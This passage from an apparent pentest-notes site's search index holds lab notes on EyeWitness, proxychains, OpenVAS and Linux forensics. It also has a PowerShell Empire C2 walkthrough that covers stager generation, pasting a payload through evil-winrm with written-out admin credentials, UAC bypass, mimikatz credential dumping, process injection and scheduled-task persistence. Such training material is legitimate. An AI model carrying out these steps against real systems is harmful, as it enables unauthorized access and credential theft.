src=\"/images/Pentesting/NP/PE/02/gs_5.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch3 id=\"user-interface-options\"\u003euser interface options:\u003c/h3\u003e\n\u003cp\u003eEstablishing a Meterpreter interactive session between the compromised system and your attacker machine enables you to perform actions to collect sensitive and confidential information from the\ntarget system.\nThe following is a brief list of useful commands that are used within Meterpreter:\u003c/p\u003e","title":"Post Exploitation Using Meterpreter"},{"content":"After discovering the subdomains of a target domain, it\u0026rsquo;s important to check each one to determine which subdomain leads to a login portal or a sensitive directory of the organization. However, there may be a lot of subdomains to check manually, and this process can be very time-consuming. As an aspiring penetration tester, you can be strategic and use a tool such as EyeWitness, which allows you to automate the process of checking each subdomain within a file and taking a screenshot of them.\ninstallation: To install run these commands: git clone https://github.com/RedSiege/EyeWitness.git cd EyeWitness/python/setup sudo ./setup.sh After running all these commands it should install the tool: Come back to the previous dir: Next, use the following commands to allow EyeWitness to capture a screenshot of each subdomain that was found within the MS-subdomains.txt file mkdir screenshots # come to the dir where eyewitness py script is present ./EyeWitness.py --web -f /home/kali/subdomains.txt -d /home/kali/screenshots --prepend-https Syntax breakdown: --web: Takes an HTTP screenshot –f: Specifies the source file, along with the list of domains to check –d: Specifies the output directory for the screenshots --prepend-https: Prepends http:// and https:// to the domains without either protocol I had various issues while installing this tool on newer kali linux, so i used a different method , so to do this follow the below commands:\ncd ~/Desktop/EyeWitness/ # 1. Create the virtual environment python3 -m venv .venv # 2. Activate it source .venv/bin/activate # 3. Install the required Python packages into it pip install -r ./Python/setup/requirements.txt # 4. Run EyeWitness (while the venv is still active) ./Python/EyeWitness.py --web -f /home/kali/MS-subdomains.txt -d /home/kali/screenshots_TUKL --prepend-https ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/02-profiling-websites-using-eyewitness/","summary":"\u003cp\u003eAfter discovering the subdomains of a target domain, it\u0026rsquo;s important to check each one to determine which subdomain leads to a login portal or a sensitive directory of the organization. However, there may be a lot of subdomains to check manually, and this process can be very time-consuming. As an aspiring penetration tester, you can be strategic and use a tool such as EyeWitness, which allows you to automate the process of checking each subdomain within a file and taking a screenshot of them.\u003c/p\u003e","title":"Profiling Websites Using EyeWitness"},{"content":" A proxy is a system such as a server that sits between a source and a destination host on a network. If a sender wants to communicate with a destination server, the sender forwards the message to the proxy, which is then forwarded to the destination server. The destination server will think the message is originating from the proxy and not the actual source. Penetration testers use proxychains, which allow them to create a logical chain of connections between multiple proxy servers when sending traffic to a target network or the internet. Proxychains allow a penetration tester to configure various types of proxies, such as the following: HTTP HTTPS SOCK4 SOCK5 Tip You can use a website such as https://spys.one/en/, which provides a list of free proxy servers. However, keep in mind that these servers may not always be online or available.\nSetting up proxychains: Fire up kali , we need to locate proxychains first, type this command: locate proxychains Now we need to edit this config file sudo vim /etc/proxychains4.conf Press esc -\u0026gt; type :set number and hit enter. This will show the number of lines. Now we need to edit the 10th line -\u0026gt; come to the 10th line and hit i on your keyboard, then uncomment the dynamic_chain option. Move to the 18th line and comment the option strict_chain ! Now we need to make use of the proxy site\u0026rsquo;s free server\u0026rsquo;s list, come to the end of the config file where it says ProxyList , you can directly search for it in vim by hitting the key / and searching after that like this /ProxyList and hit enter. Add some proxy servers at the end by commenting the TOR one which says socks4 127.0.0.1 9050 Hit esc and press :wq To test the proxychains use this command proxychains4 firefox ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/02-proxychains/","summary":"\u003col\u003e\n\u003cli\u003eA proxy is a system such as a server that sits between a source and a destination host on a network. If a sender wants to communicate with a destination server, the sender forwards the message to the proxy, which is then forwarded to the destination server. The destination server will think the message is originating from the proxy and not the actual source.\u003c/li\u003e\n\u003cli\u003ePenetration testers use proxychains, which allow them to create a logical chain of connections between multiple proxy servers when sending traffic to a target network or the internet. Proxychains allow a penetration tester to configure various types of proxies, such as the following:\n\u003cul\u003e\n\u003cli\u003eHTTP\u003c/li\u003e\n\u003cli\u003eHTTPS\u003c/li\u003e\n\u003cli\u003eSOCK4\u003c/li\u003e\n\u003cli\u003eSOCK5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003e\u003cimg alt=\"pc_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/02/pc_1.png\"\u003e\u003c/p\u003e","title":"Proxychains Configuration"},{"content":"C2 OPERATION: Power on the main Kali Linux virtual machine (not the clone), open the Terminal, and use the ifconfig eth0{whatever interface you are having as NAT} command to determine the IP address on the eth0 interface as shown below: This ip address will act as an empire server , while the clone vm will act as a empire client . Start the maria DB service in the kali vm(not the clone) : Next, use the following commands to start the Empire server on the main Kali Linux virtual machine: sudo powershell-empire server 5. Next, power on the Empire Client (clone of Kali Linux) virtual machine and use the following commands to edit the Empire client configuration file to insert the Empire server information:\nsudo nano /etc/powershell-empire/client/config.yaml Paste the following code snippet at the end of the server\u0026rsquo;s list: Empire-Server: host: http://192.168.83.128 # main kali ip to connect the client with it port: 1337 socketport: 5000 username: empireadmin password: password123 7. Now start the empire client from the cloned kali:\nsudo systemctl start mariadb.service sudo powershell-empire client 8. Establishing the connection to empire server, before that make sure your main kali machine\u0026rsquo;s firewall is not blocking the tcp port 1337 for incoming connections, follow the commands:\n# on main kali machine sudo ufw status sudo ufw allow 1337/tcp # on EMPIRE CLIENT machine (Empire) \u0026gt; connect -c Empire-Server we can do the same steps inside one kali machine also, by the help of different tabs.\nManaging users on Empire: On the Empire client console, execute the following commands to access the administrative menu and view the list of current user accounts: (Empire) \u0026gt; admin (Empire: admin) \u0026gt; user_list 2. To create a new user on the Empire server, use the create_user command with the username as NewUser1 and the password as Password123, followed by the authoritative user (admin) for creating the account:\n(Empire: admin) \u0026gt; create_user NewUser1 Password123 Password123 admin (Empire: admin) \u0026gt; user_list 3. To disable an user account use the disable_user \u0026lt;User_id\u0026gt; command:\n(Empire: admin) \u0026gt; disable_user 1001 To view a list of available commands/options under a context menu, use the `help command. Using the back command will return you to the previous menu and the main command will carry you to the main menu within Empire. Post exploitation using Empire: We will be using our windows serverr 2019 as a target system for this exercise. Creating a listener: A listener is a module within the Empire server that listens for an incoming connection from an agent running on a compromised host. Without a listener on the Empire server, you won’t be able to send instructions to the agents that are running on the compromised systems. On the empire client console , use the following command to setup a HTTP listener (Empire) \u0026gt; uselistener http 3. Change the name of the default listener using the command set Name \u0026lt;New_name\u0026gt;\n(Empire: uselistener/http) \u0026gt; set Name DC_Listener Next, you will need to configure the callback host settings. This is the IP address on the eth0 interface of your Kali Linux machine on the (192.168.83.0/24) network that is running the Empire server: (Empire: uselistener/http) \u0026gt; set Host 192.168.83.128 (Empire: uselistener/http) \u0026gt; set Port 1335 # allowed the connection on my main kali before running this command Type options to verify the changes. Run the listener using the command execute Use the back command to come back a few times{optional}, and then use the command listeners to see your listeners that been setup by you: (Empire: uselistener/http) \u0026gt; listeners The listener has been setup and waiting for incoming connections.\nCreating a stager: A stager is a module within Empire that allows penetration testers to execute the agent (payload) on the targeted system. When an agent is executed on a compromised host, it will attempt to establish a connection back to the listener on the Empire server running on Kali Linux. This allows the penetration tester to perform post-exploitation tasks on any active agents.\nOn the Empire client console, let’s create a multi-launcher stager by using the following command: (Empire) \u0026gt; usestager multi_launcher 2. Next, set the listener option to DC_Listener:\n(Empire: usestager/multi_launcher) \u0026gt; set Listener DC_Listener Generate the stager malicious powershell code using the command generate (Empire: usestager/multi_launcher) \u0026gt; generate 4. Next, open a new Terminal on main kali and use Evil-WinRM to establish a PowerShell session on the windows server 2019\nevil-winrm -i 192.168.83.140 -u Administrator -p P@ssword1 5. Then paste the malicious code into this evil-winrm session. working with agents: To view a list of agents inside empire client use the command agents I am having multiple sessions, but you should have one session for now. 2. Whenever you will see an astrick(*) with the name of the agent, that means we are running with the elevated privileges. 3. To interact with an agent use the command interact \u0026lt;egnt_id\u0026gt; use the help command for available commands we can run 4. Additionally, to determine whether the agent is running with elevated privileges on the compromised host, use the following command:\n(Empire: YDPKMU42) \u0026gt; display high_integrity 5. If the agent is not running with elevated privileges, you can use the bypassuac command to escalate the privileges:\nbypassuac DC_Listener To remotely execute a command on the compromised host, use the shell \u0026lt;command\u0026gt; command: (Empire: YDPKMU42) \u0026gt; shell whoami (Empire: YDPKMU42) \u0026gt; shell ipconfig 7. Running mimikatz for credential dumping: 8. To see the loot use the command credentials Creating a new agent: During a penetration test, having multiple connections or reverse shells on compromised hosts will prove to be especially useful in the event one shell should unexpectedly be terminated. Using Empire, you can create multiple agents on the same compromised host using an existing agent, by using the following instructions, although i am already running 2 shells of the same machine and used 2 different agents:\nInteract with the agent first: List all the processes using the ps command We can use the PID of a common, less-suspecting process, such as wsmprovhost, on the compromised host to spawn a new agent. Creating a new agent using psinject command on the compromised host: (Empire: CSM26U8L) \u0026gt; psinject DC_Listener 2268 5. As shown in the preceding screenshot, the new agent has spawned. However, notice the new agent is created with elevated privileges because wsmprovhost was running using the local Administrator account. If the new agent is not running with elevated privileges, you won’t be able to perform administrative or high-privilege tasks on the compromised host. You will need to elevate the privileges of the new agent to do so. 6. Use the following commands to interact with the compromised host and spawn a command shell into empire client Threat emulation: Threat emulation focuses on testing the cyber defenses of an organization and their capabilities to detect and prevent various techniques used by threat actors. Improving threat emulation using Empire during a penetration test engagement tests whether a targeted organization can detect unknown threats disguised in common network traffic such as Windows updates, Gmail, and Office 365 traffic types.\nOn the Empire client use the http_mellable listener module: (Empire: agents) \u0026gt; uselistener http_malleable 2. Follow the given screenshots for setting up the listener: use the port 9443 Also make sure in your server machine , incoming connections are allowed on this port for reverse shells: 3. Then create a new stager for the listener ThreatEmulation: 4. Then paste and execute the malicious code inside the evil winrm session of the target: 5. You should be able to see a new session checked in inside the empire client 6. Interact with the agent: Setting up persistence: Establishing persistence on a compromised host will ensure you have access to the host at any time when it is online on the target network. It’s important to note that persistent access should be maintained on the compromised host even after the system reboots or security measures are applied. But during penetration tests we need to make sure this step is part of the engagement.\nImportant When setting up persistence, please be mindful that the persistence modules may create intentional backdoors on the compromised systems, which may allow other threat actors to gain access. Persistence should only be used during a penetration test if it is needed or within the scope of the engagement. If you set up persistence on compromised hosts during your penetration test, be sure to remove it at the end of your penetration test to prevent unauthorized access by other threat actors.\nStart by interacting with an active agent with elevated privileges and use the scheduled task persistence module: (Empire: X65ZRGUH) \u0026gt; usemodule powershell_persistence_elevated_schtasks 2. Options and execution: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/09-command-and-control-tactics/02-c2-operation-setup/","summary":"\u003ch2 id=\"c2-operation\"\u003eC2 OPERATION:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003ePower on the main Kali Linux virtual machine (not the clone), open the Terminal, and use the ifconfig eth0{whatever interface you are having as NAT} command to determine the IP address on the eth0 interface as shown below:\n\u003cimg alt=\"c2_op_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/01/c2_op_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003eThis ip address will act as an \u003ccode\u003eempire server\u003c/code\u003e , while the clone vm will act as a \u003ccode\u003eempire client\u003c/code\u003e .\u003c/li\u003e\n\u003cli\u003eStart the \u003ccode\u003emaria DB\u003c/code\u003e service in the kali vm(not the clone) :\n\u003cimg alt=\"c2_op_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/01/c2_op_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eNext, use the following commands to start the Empire server on the main Kali Linux virtual machine:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo powershell-empire server\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"c2_op_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/01/c2_op_3.png\"\u003e\n5. Next, power on the \u003ccode\u003eEmpire Client\u003c/code\u003e (clone of Kali Linux) virtual machine and use the following commands to edit the Empire client configuration file to insert the Empire server information:\u003c/p\u003e","title":"Setting Up C2 Operations"},{"content":"The Open Vulnerability Assessment Scanner (OpenVAS) tool is a free vulnerability scanner that allows both ethical hackers and penetration testers to perform a vulnerability assessment on a network. OpenVAS can scan both authenticated and unauthenticated vulnerability assets within an organization. Greenbone Vulnerability Manager (GVM) is a centralized management tool that manages the functions and vulnerabilities of OpenVAS. In this exercise, you will learn how to set up GVM on Kali Linux and perform a vulnerability assessment on a target using OpenVAS.\nInstallation guide: Open up a terminal in kali linux: sudo apt update sudo apt install gvm Once the installation is complete, use the following command: sudo gvm-setup It will take some time to fetch the upgrades and then provide one more time the username and password. 3. Next, use the sudo gvm-start command to start the GVM service. 4. changing the password of gvm\nsudo runuser -u _gvm -- gvmd --user=admin --new-password=\u0026lt;new-password\u0026gt; After logging in To add a target -\u0026gt; click on configuration -\u0026gt; Targets -\u0026gt; New target button\nAdd the details on Name and Hosts and click save To scan a target -\u0026gt; click on scan -\u0026gt; Tasks -\u0026gt; new tasks click on the play button and complete the scan. It may take some time to sync the tasks. GVM-DOC ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/05-vulnerability-assessment/02-working-with-greenbone-vuln-manager/","summary":"\u003cp\u003e\u003ccode\u003eThe Open Vulnerability Assessment Scanner (OpenVAS)\u003c/code\u003e tool is a free vulnerability scanner that allows both ethical hackers and penetration testers to perform a vulnerability assessment on a network. OpenVAS can scan both authenticated and unauthenticated vulnerability assets within an organization.\n\u003cstrong\u003eGreenbone Vulnerability Manager (GVM)\u003c/strong\u003e is a centralized management tool that manages the functions and vulnerabilities of OpenVAS. In this exercise, you will learn how to set up GVM on Kali Linux and perform a vulnerability assessment on a target using OpenVAS.\u003c/p\u003e","title":"Working With Greenbone Vulnerability Manager"},{"content":"Volatile: Collecting hostname, date and time: hostname hostnamectl date cat /etc/timezone timedatectl epoch time: date +%s system uptime: uptime Network information: ip a # short form of ip addr show ifconfig # promisc mode detection: ifconfig eth0 ip link show eth0 # other network info commands: netstat -i netstat -rn # routing tables ip r # routing tables open port info: nmap -sT localhost nmap -sU localhost # UDP port sudo lsof -i tcp # checking tcp listening connections of localhost sudo lsof -n -P | grep LISTEN netstat -tulpn listing current user\u0026rsquo;s open processes: sudo lsof -u user_name mounted file system info: mount # info about file systems df -h # file systems info but in human readable format kernel module info, sound driver info: modinfo ufs # kernel module modinfo snd # sound module info user event collection: id Reading ELF file: readelf -h file_name # file header reading running processes: ps aux -ww swap area and disk partition info: cat /proc/partitions # disk partition cat /proc/swaps # swap info kernel message - kernel ring buffer info: dmesg Non-volatile: Collecting system info: cat /proc/cpuinfo cat /proc/self/mounts kernel info: uname -r cat /proc/version hostnamectl | grep Kernel local user account information: cat /etc/passwd cat /etc/passwd | cut -d: -f1 # seperating users from the output logged on user information: w last # login history information collecting system logs: cat /var/log/syslog cat /var/log/kern.log # linux kernel logs cat /var/log/fail.log cat /var/log/mail.* cat /var/log/mysql.* cat /var/log/daemon.log cat /var/log/debug journalctl history and hidden file information: history ls -al # hidden files suspicious info: sudo rkhunter --check --rwo sudo chkrootkit # rootkit checker file signature analysis: xxd file_name | head -n 10 basic file information: file file_name strings -t -d file_name # finding writable files inside /var/log directory : find / -writeable -type f 2\u0026gt; /dev/null | grep \u0026#34;/var/log\u0026#34; Directory permission checking: ls -ld Desktop File system analysis using The Sleuth Kit: Creating an file system image using dd: Important Before that add a virtual hard disk of 1gb for testing purpose on your vm through vmware -\u0026gt; vm settings -\u0026gt; add -\u0026gt; hard disk -\u0026gt; SCSI -\u0026gt; Create new virtual disk -\u0026gt; 1 gb -\u0026gt; Done.\nThen use the following guide.\nsudo dd if=/dev/sdb of=/home/user_name/Desktop/virtual_disk.img bs=4M status=progress # do every process as a root user mkfs.ext4 Desktop/virtual_disk.img # mounting the file system mkdir /mnt/my_image mount -o loop Desktop/virtual_disk.img /mnt/my_image # creating evidences echo \u0026#34;This is a secret message\u0026#34; \u0026gt; /mnt/my_image/secret.txt touch /mnt/my_image/evidence.dat # unmount then umount /mnt/my_image analysis: # install sleuth kit sudo apt install sleuthkit sudo fsstat -i raw Desktop/virtual_disk.img sudo fls Desktop/virtual_disk.img istat Desktop/virtual_disk.img 12 ","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-250/linux-forensics/","summary":"\u003ch2 id=\"volatile\"\u003eVolatile:\u003c/h2\u003e\n\u003ch3 id=\"collecting-hostname-date-and-time\"\u003eCollecting hostname, date and time:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehostname\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehostnamectl\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edate\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /etc/timezone\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003etimedatectl\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"lf_1\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_2/lf_1.png\"\u003e\n\u003cimg alt=\"lf_2\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_2/lf_2.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"epoch-time\"\u003eepoch time:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edate +%s\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"system-uptime\"\u003esystem uptime:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euptime\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"network-information\"\u003eNetwork information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eip a \u003cspan class=\"c1\"\u003e# short form of ip addr show\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eifconfig \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# promisc mode detection:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eifconfig eth0\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eip link show eth0\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# other network info commands:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -i \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -rn \u003cspan class=\"c1\"\u003e# routing tables\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eip r \u003cspan class=\"c1\"\u003e# routing tables\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"open-port-info\"\u003eopen port info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sT localhost\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sU localhost \u003cspan class=\"c1\"\u003e# UDP port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo lsof -i tcp \u003cspan class=\"c1\"\u003e# checking tcp listening connections of localhost\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo lsof -n -P \u003cspan class=\"p\"\u003e|\u003c/span\u003e grep LISTEN\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -tulpn\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"listing-current-users-open-processes\"\u003elisting current user\u0026rsquo;s open processes:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo lsof -u user_name\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"mounted-file-system-info\"\u003emounted file system info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emount \u003cspan class=\"c1\"\u003e# info about file systems\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edf -h \u003cspan class=\"c1\"\u003e# file systems info but in human readable format\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"kernel-module-info-sound-driver-info\"\u003ekernel module info, sound driver info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emodinfo ufs \u003cspan class=\"c1\"\u003e# kernel module\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emodinfo snd \u003cspan class=\"c1\"\u003e# sound module info\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"user-event-collection\"\u003euser event collection:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eid\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"reading-elf-file\"\u003eReading ELF file:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ereadelf -h file_name \u003cspan class=\"c1\"\u003e# file header reading\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"running-processes\"\u003erunning processes:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eps aux -ww\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"swap-area-and-disk-partition-info\"\u003eswap area and disk partition info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/partitions \u003cspan class=\"c1\"\u003e# disk partition\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/swaps \u003cspan class=\"c1\"\u003e# swap info\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"kernel-message---kernel-ring-buffer-info\"\u003ekernel message - kernel ring buffer info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edmesg\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"non-volatile\"\u003eNon-volatile:\u003c/h2\u003e\n\u003ch3 id=\"collecting-system-info\"\u003eCollecting system info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/cpuinfo\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/self/mounts\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"kernel-info\"\u003ekernel info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euname -r\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/version\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehostnamectl \u003cspan class=\"p\"\u003e|\u003c/span\u003e grep Kernel\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"local-user-account-information\"\u003elocal user account information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /etc/passwd \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /etc/passwd \u003cspan class=\"p\"\u003e|\u003c/span\u003e cut -d: -f1 \u003cspan class=\"c1\"\u003e# seperating users from the output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"logged-on-user-information\"\u003elogged on user information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ew\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003elast \u003cspan class=\"c1\"\u003e# login history information\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"collecting-system-logs\"\u003ecollecting system logs:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/syslog\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/kern.log \u003cspan class=\"c1\"\u003e# linux kernel 